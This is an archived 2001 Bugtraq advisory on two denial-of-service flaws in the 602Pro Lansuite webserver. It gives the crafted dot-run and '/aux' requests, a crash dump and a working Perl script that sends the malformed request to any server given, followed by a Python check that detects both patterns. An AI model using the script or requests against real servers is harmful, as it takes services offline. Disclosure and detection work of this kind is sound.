Bugtraq mailing list archives
602Pro Lansuite Denial Of Service 1.0.34
From: nitr0s () HOTMAIL COM
Date: Mon, 26 Mar 2001 11:58:27 -0000
Advisory Name: Lansuite Webserver Denial of Service
Discovered: 8th and 23rd Of March 2001
Application: 602Pro Lansuite 2000a 1.0.34 - prior versions and possibly 1.0.35
Platform: Windows 2k,95/98/NT - others unknown
Severity: Denial of service from application
Credit: Liamer () eircom net
Vendor Status: Unknown - http://www.602software.com/

Description:

There are 2 problems, the first is a buffer overflow in WEBPROX.DLL and the other in relation to MS-DOS device files. Credit should be given to Gründl <peter.grundl () defcom com> who made me think of trying this same problem that he found in Alt-N Technologies MDaemon WebConfiguration feature which also affects Xitami Webserver 2.4b5 and probably a whole load of other windows server programs.

Demonstration:

Connect to the webserver and send the following request:

GET /%2e%2e%2e%2e.... /HTTP/1.0

Where %2e is over 157 times

The server depending on how many times %2e or [.] is sent will exit displaying the following error:

LANSUITE caused an invalid page fault in module WEBPROX.DLL at 015f:008a1326.
Registers:
EAX=0000000a CS=015f EIP=008a1326 EFLGS=00010216
EBX=00000008 SS=0167 ESP=05202848 EBP=05202848
ECX=0000000a DS=0167 ESI=81648e38 FS=2c37
EDX=334f2b1f ES=0167 EDI=81623ff0 GS=0000
Bytes at CS:EIP:
8b 48 2c 83 e1 01 85 c9 74 2d 8b 55 08 c7 42 18
Stack dump:
052029dc 00862e9a 0000000a 334f2b1f 000000fa 81623ff0 81648e38 00000008
bff7b317 018d0000 00000000 018d1650 018d1650 0520ace7 018d164c 052028cc

The other problem is requesting MS-DOS device files, send the following request to the webserver on port 80

GET /aux

---------------------------------------------------------------
#!/usr/bin/perl
#
# 602Pro Lansuite 2000a 1.0.34 Denial Of Service
#
#
# Malformed GET request
#
use Getopt::Std;
use Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
my ($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);
$foo = "%2e";
$number = "160";
$data .= $foo x $number;
$serv = $args{s};
$port = 80;
$buf = "GET /$data /HTTP/1.0\r\n\r\n";
$in_addr = (gethostbyname($serv))[4] || die("Error: $! \n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $! \n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(S, PF_INET, SOCK_STREAM, $proto) || die ("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";
print("Data has been successfully sent to $serv\n");
sub usage {die("\n\n$0 -s <server>\n\n");}
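
A request-line check for the two conditions described in this advisory, as an added example that is not part of the original post: it flags over-long runs of encoded or literal dots and path segments that name an MS-DOS device, for use in a filtering proxy or when reviewing access logs. The function name, the dot-run threshold and the device names other than `aux` are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Reserved MS-DOS device names on Windows (the advisory itself only names "aux").
DOS_DEVICES = {"CON", "PRN", "AUX", "NUL",
               *(f"COM{i}" for i in range(1, 10)),
               *(f"LPT{i}" for i in range(1, 10))}
MAX_DOT_RUN = 2  # assumption: "." and ".." are the only legitimate dot runs


def inspect_request_line(line):
    """Return a list of findings for one HTTP request line (empty if clean)."""
    parts = line.strip().split()
    if len(parts) < 2:
        return ["malformed request line"]
    path = parts[1].split("?", 1)[0]
    # Decode repeatedly so double-encoded dots (%252e) are also reduced to "."
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    findings = []
    longest = max((len(m) for m in re.findall(r"\.+", path)), default=0)
    if longest > MAX_DOT_RUN:
        findings.append(f"dot run of length {longest}")
    for segment in re.split(r"[/\\]", path):
        # Windows resolves "aux", "AUX.txt" and "aux:" to the same device
        base = segment.split(".", 1)[0].rstrip(" :").upper()
        if base in DOS_DEVICES:
            findings.append(f"DOS device name {base}")
    return findings


# Constructed sample request lines (not captured traffic)
SAMPLES = [
    "GET /index.html HTTP/1.0",
    "GET /" + "%2e" * 160 + " /HTTP/1.0",
    "GET /aux",
    "GET /docs/../Aux.txt HTTP/1.0",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(s[:40], "->", inspect_request_line(s) or "ok")
```
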